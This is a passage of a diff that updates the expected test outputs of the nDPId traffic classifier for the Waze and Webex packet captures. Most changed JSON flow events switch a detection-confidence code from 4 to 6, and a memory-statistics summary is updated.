+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1435587871935,"flow_last_seen":1435587874495,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":6561,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} 00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880578,"flow_last_seen":1435587880583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":41823,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880578,"flow_last_seen":1435587880583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":41823,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880576,"flow_last_seen":1435587880583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.31","src_port":43991,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880576,"flow_last_seen":1435587880583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.31","src_port":43991,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880583,"flow_last_seen":1435587880590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60574,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00569{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880583,"flow_last_seen":1435587880590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60574,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1435587867755,"flow_last_seen":1435587873026,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11779,"flow_tot_l4_payload_len":61187,"flow_avg_l4_payload_len":1653,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1435587867755,"flow_last_seen":1435587873026,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11779,"flow_tot_l4_payload_len":61187,"flow_avg_l4_payload_len":1653,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} 00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880577,"flow_last_seen":1435587880583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":46473,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880577,"flow_last_seen":1435587880583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":46473,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00627{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880589,"flow_last_seen":1435587880590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60479,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00570{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880589,"flow_last_seen":1435587880590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60479,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1435587867443,"flow_last_seen":1435587867753,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.89.75.198","src_port":46214,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} +00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1435587867443,"flow_last_seen":1435587867753,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.89.75.198","src_port":46214,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880581,"flow_last_seen":1435587880589,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52746,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880581,"flow_last_seen":1435587880589,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52746,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1435587866603,"flow_last_seen":1435587898628,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":15,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"174.37.231.81","src_port":42256,"dst_port":5222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -235,9 +235,9 @@ ~~ total active/idle flows...: 33/33 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5996472 bytes -~~ total memory freed........: 5996472 bytes -~~ total allocations/frees...: 118939/118939 +~~ total memory allocated....: 6130106 bytes +~~ total memory freed........: 6130106 bytes +~~ total allocations/frees...: 121701/121701 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 452 chars ~~ json string max len.......: 1348 chars diff --git a/test/results/webex.pcap.out b/test/results/webex.pcap.out index 637458656..e91355ec5 100644 --- a/test/results/webex.pcap.out +++ b/test/results/webex.pcap.out @@ -4,14 +4,14 @@ 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1444570624853,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570624853,"pkt":"ABoRAAACABoRAAABCABFAAA8OXNAAEAGTZUKCAABQERpZ6GCAbtPGIcMAAAAAKACOQgjFwAAAgQFtAQCCAoATL5\/AAAAAAEDAwY="} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1444570624860,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570624860,"pkt":"ABoRAAACABoRAAABCABFAAAoAQ5AABAGtg5ARGlnCggAAQG7oYKw53jzTxiHDVAS\/\/9Y4AAA"} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1444570624860,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570624860,"pkt":"ABoRAAACABoRAAABCABFAAAoOXRAAEAGTagKCAABQERpZ6GCAbtPGIcNsOd49FAQOQgf2QAA"} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570624853,"flow_last_seen":1444570624860,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1444570624860,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01308{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570624853,"flow_last_seen":1444570625424,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2720,"flow_tot_l4_payload_len":4134,"flow_avg_l4_payload_len":516,"midstream":0,"thread_ts_msec":1444570625424,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","server_names":"*.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570624853,"flow_last_seen":1444570624860,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1444570624860,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01308{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570624853,"flow_last_seen":1444570625424,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2720,"flow_tot_l4_payload_len":4134,"flow_avg_l4_payload_len":516,"midstream":0,"thread_ts_msec":1444570625424,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","server_names":"*.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570627404,"flow_last_seen":1444570627404,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570627404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1444570627404,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570627404,"pkt":"ABoRAAACABoRAAABCABFAAA8hnNAAEAGAJUKCAABQERpZ6GEAbuwMDkNAAAAAKACOQgO\/QAAAgQFtAQCCAoATL9+AAAAAAEDAwY="} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1444570627409,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570627409,"pkt":"ABoRAAACABoRAAABCABFAAAoASZAABAGtfZARGlnCggAAQG7oYRPz8bysDA5DlAS\/\/9Y3gAA"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1444570627410,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570627410,"pkt":"ABoRAAACABoRAAABCABFAAAohnRAAEAGAKgKCAABQERpZ6GEAbuwMDkOT8\/G81AQOQgf1wAA"} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570627404,"flow_last_seen":1444570627411,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570627411,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570627404,"flow_last_seen":1444570627815,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1444570627815,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570627404,"flow_last_seen":1444570627411,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570627411,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570627404,"flow_last_seen":1444570627815,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1444570627815,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570628113,"flow_last_seen":1444570628113,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570628113,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1444570628113,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570628113,"pkt":"ABoRAAACABoRAAABCABFAAA8CqVAAEAGfGMKCAABQERpZ6GGAbuTEbVkAAAAAKACOQivfwAAAgQFtAQCCAoATL\/BAAAAAAEDAwY="} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1444570628117,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570628117,"pkt":"ABoRAAACABoRAAABCABFAAAoATVAABAGtedARGlnCggAAQG7oYZs7kqbkxG1ZVAS\/\/9Y3AAA"} @@ -19,11 +19,11 @@ 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1444570628117,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570628117,"pkt":"ABoRAAACABoRAAABCABFAAA8SvxAAEAGPAwKCAABQERpZ6GHAbtcKPU9AAAAAKACOQimjgAAAgQFtAQCCAoATL\/BAAAAAAEDAwY="} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1444570628121,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570628121,"pkt":"ABoRAAACABoRAAABCABFAAAoATZAABAGteZARGlnCggAAQG7oYej1wrCXCj1PlAS\/\/9Y2wAA"} 